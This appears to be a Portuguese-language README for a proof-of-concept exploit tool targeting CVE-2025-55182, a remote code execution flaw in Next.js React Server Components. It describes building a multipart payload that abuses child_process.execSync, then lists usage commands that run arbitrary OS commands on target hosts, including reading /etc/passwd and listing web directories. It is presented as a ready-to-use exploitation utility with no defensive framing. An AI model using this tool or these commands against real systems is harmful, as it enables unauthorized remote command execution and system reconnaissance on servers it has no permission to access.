
POC-CVE-2025-55182
CVE-2025-55182 Scanner Avançado
Um utilitário de exploração completo para CVE-2025-55182 — Execução Remota de Código via Componentes de Servidor React no Next.js. O scanner cria automaticamente o payload multipart e abusa de process.mainModule.require('child_process').execSync() para alcançar execução arbitrária de comandos do SO em instâncias vulneráveis.
chmod +x scanner.sh
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
Sinta-se à vontade para entrar em contato pelo mailto:[email protected]